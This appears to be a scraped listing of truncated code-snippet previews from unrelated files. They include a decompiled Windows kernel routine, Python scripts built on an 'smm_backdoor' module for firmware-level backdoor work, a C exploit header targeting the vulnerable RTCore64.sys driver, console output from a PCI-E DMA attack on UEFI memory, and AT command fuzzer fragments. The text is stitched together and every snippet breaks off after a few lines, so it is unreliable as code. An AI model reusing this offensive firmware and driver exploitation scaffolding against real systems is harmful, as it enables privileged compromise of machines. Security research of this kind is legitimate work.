To find SKPROCESS Policy offset: | |
__int64 __fastcall SkpspFindPolicy(__int64 a1, __int64 a2, int a3, __int64 a4, __int64 a5) | |
{ | |
v5 = a4; | |
v6 = a3; | |
v7 = a2; | |
v8 = a1; | |
v12 = 0i64; | |
v9 = a1 + 0x1B8; // <-- |
#include <stdlib.h> | |
#include <stdbool.h> | |
#include <irq.h> | |
#include <libbase/uart.h> | |
#include <libbase/console.h> | |
#include <generated/csr.h> | |
#include "adder.h" |
#!/usr/bin/env python | |
import sys, os, time, platform, ctypes | |
from struct import pack, unpack | |
from optparse import OptionParser, make_option | |
import smm_backdoor as bd | |
# how many seconds to wait for a VM exit to occur | |
VM_EXIT_WAIT = 3 |
#!/usr/bin/env python | |
import sys, os, platform, ctypes, ctypes.wintypes | |
from struct import pack, unpack | |
import smm_backdoor as bd | |
# MSR register used by swapgs | |
IA32_KERNEL_GS_BASE = 0xc0000102 |
#!/usr/bin/env python | |
import sys, os, platform, ctypes | |
from struct import pack, unpack | |
import smm_backdoor as bd | |
try: | |
import capstone |
#include "stdafx.h" | |
// vulnerable driver device name | |
#define EXPL_DEVICE_PATH "\\\\.\\Global\\RTCore64" | |
// vulnerable driver service and file name | |
#define EXPL_DRIVER_NAME "RTCore64.sys" | |
#define EXPL_SERVICE_NAME "RTCore64" | |
// vulnerable driver IOCTL codes |
$ ./uefi.py | |
[+] Scanning memory range 0x76000000:0xa0000000 | |
[+] Waiting for PCI-E link... | |
[+] PCI-E link with target is up | |
[+] Looking for DXE driver PE image... | |
[+] PE image is at 0x77866000 | |
[+] PE image is at 0x77871000 | |
[+] PROTOCOL_ENTRY address is 0x76bfaa98 | |
[+] Registered UEFI protocols and interfaces: |
import sys, os, mmap, subprocess | |
from struct import pack, unpack | |
from ctypes import * | |
IA32_SYSENTER_ESP = 0x175 | |
IA32_SYSENTER_EIP = 0x176 | |
class PyObj(Structure): | |
_fields_ = [( 'ob_refcnt', c_size_t ), |
{ | |
"AT_CMD_GRAMMARS": { | |
"+CGSN": { | |
"struct": ["cmd"], | |
"cmd": "+CGSN" | |
}, | |
"+CIND": { | |
"struct": ["cmd"], |
#!/usr/bin/env python2 | |
''' | |
******************************************************************************** | |
AT commands fuzzer based on ATFuzzer code base. | |
* https://github.com/Imtiazkarimik23/ATFuzzer | |
* https://relentless-warrior.github.io/wp-content/uploads/2019/11/atfuzz.pdf |